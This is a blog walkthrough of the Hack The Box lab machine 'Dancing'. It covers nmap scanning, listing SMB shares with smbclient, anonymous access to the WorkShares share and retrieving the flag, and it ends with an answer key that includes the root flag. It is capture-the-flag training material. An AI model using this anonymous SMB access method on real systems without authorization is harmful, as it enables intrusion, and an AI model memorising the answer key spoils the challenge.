top of page
Writer's pictureRohan A G
Sep 253 min read

Hack the Box: DANCING

Machine difficulty: Very Easy

Setting up the environment

Refer the blog on the machine MEOW to configure and connect to the HTB VPN.

 

Cracking DANCING

STEP 1: Launch the machine

In order to use the machine, we must first launch an instance of it. However, connecting to the VPN is necessary before the machine can be spawned. If you're unsure where to begin, take a look at my Meow walkthrough where I already discussed on the topic. You will be granted an IP address once you have joined and created a machine.

 

STEP 2: Check its status

We can use the ping tool to test if the machine responds to our ICMP messages in order to verify that we can interact with it. You may do this from the terminal by entering ping followed by the device's IP address as shown in the image above.

 

 

STEP 3: Enumeration

When the target responds successfully, we can say that a connection has been made and is secure. We can now proceed to the following stage, which entails examining all open ports on the target to determine whether services are currently active on them. The following command will be used to launch the scanning process using the Nmap script.

The Network Mapper, or Nmap, tool will try to send inquiries to the target's ports in the hopes of getting a response, enabling it to ascertain whether or not the port is open. Certain ports are automatically used by specific services. Because certain recognized services might not be standard, we will utilize the service detection flag -sV to determine the name and description of the recognized services.

 

Enter the nmap command as shown in the image above. We observe that we were able to obtain the port and the service running on the following port i.e 135,139,445/TCP running ms remote procedure call, NetBIOS and  respectively.

We used our local username to perform this command because we were unsure of the target's other usernames. We then received a password request. We are attempting to circumvent this by performing a guest authentication or an anonymous authentication, as any of these will allow us to log in without having to know a username and password combination.

 

When asked for a password, we just press Enter to advance the script, which now displays four different shares as seen in the image above.

·        ADMIN$-These administrative shares, or ADMIN$, are concealed network shares that give system administrators remote access for a variety of uses.

·        C$ - The disk volume's administrative share.

·        IPC$ - The inter-process communication share is denoted by the symbol IPC$.

·        WorkShares - Is a custom share that we may wish to investigate more.

 

 

STEP 4: Gaining access

Let's try to get a hold of these shares. If any of them have default settings and enable password bypassing by simply pressing enter, we can start with ADMIN$.

As we can observe we do not have the correct credentials for the authentication. Lets try C$.

The same as scenario again where we do not have the proper details for authentication/. Lets try Workshares.



 

Success! We're here. This share contained a weak username/password pair. As we can see, the smb: > prompt informs us that the SMB service is being used by our shell.

 

 

 

 

 

 

 

The ls command can, as usual, be used to display the directories:

To navigate to each directory, we can use the cd command. See what Amy.J has to offer. We discover worknotes.txt.

Using the get command, we can obtain the worknotes.txt file.

Returning, let's swap directories to James.P.

We locate a flag.txt file by listing the files. For later use, we can download the file to the place where we launched our smbclient.

The SMB shell can be terminated, and the hash value of the flag can be output using the cat command.

Congratulations! Now that we have the answers, let's pwn the box.

 

ANSWER KEYS

  1. What does the 3-letter acronym SMB stand for? – Server Message Block

  2. What port does SMB use to operate at? – 445

  3. What network communication model does SMB use, architecturally speaking? – Client-Server Model

  4. What is the service name for port 445 that came up in our nmap scan? – microsoft-ds

  5. What is the tool we use to connect to SMB shares from our Linux distribution? – smbclient

  6. What is the flag or switch we can use with the SMB tool to list the contents of the share? – -L

  7. What is the name of the share we are able to access in the end? – WorkShares

  8. What is the command we can use within the SMB shell to download the files we find? – get

  9. Submit root flag – 5f61c10dffbc77a704d76016a22f1664

 

2 views0 comments

Recent Posts

See All

Comentarios

bottom of page